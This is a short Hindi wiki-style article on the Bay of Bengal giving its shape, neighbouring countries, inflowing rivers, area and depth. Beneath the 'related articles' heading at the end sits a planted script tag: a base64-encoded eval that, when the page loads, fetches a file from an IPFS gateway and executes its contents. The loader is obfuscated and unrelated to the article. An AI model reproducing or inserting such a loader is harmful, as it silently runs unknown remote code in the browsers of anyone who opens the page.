बंगाल की खाड़ी
भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (चर्चा | योगदान) द्वारा परिवर्तित 10:23, 9 अप्रैल 2013 का अवतरण
बंगाल की खाड़ी विश्व की सबसे बड़ी खाड़ी है। यह हिन्द महासागर का उत्तरपूर्वी भाग है। इसका नाम भारतीय राज्य पश्चिम बंगाल के नाम पर आधारित है। इस खाड़ी में ही न्यूमूर द्वीप स्थित है, जो कि एक निर्जन द्वीप है। इस द्वीप को भारत में 'पुरबाशा' और बांग्लादेश में 'दक्षिण तलपट्टी' के नाम से जाना जाता है।
- आकार में यह खाड़ी त्रिभुजाकार है, जिसके उत्तर में बांग्लादेश और पश्चिम बंगाल, पूर्व में म्यांमार और अंडमान एवं निकोबार द्वीपसमूह और पश्चिम में भारत तथा श्रीलंका स्थित हैं।
- गंगा, ब्रह्मपुत्र, कावेरी, गोदावरी और स्वर्णरेखा आदि नदियाँ इसी में अपना जल विसर्जित करती हैं।
- बंगाल की खाड़ी का क्षेत्रफल लगभग 2,172,000 किमी² है।
- इस खाड़ी की औसत गहराई 8500 फीट (2600 मीटर) और अधिकतम गहराई 15400 फीट (4694 मीटर) है।
|
|
|
|
|
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>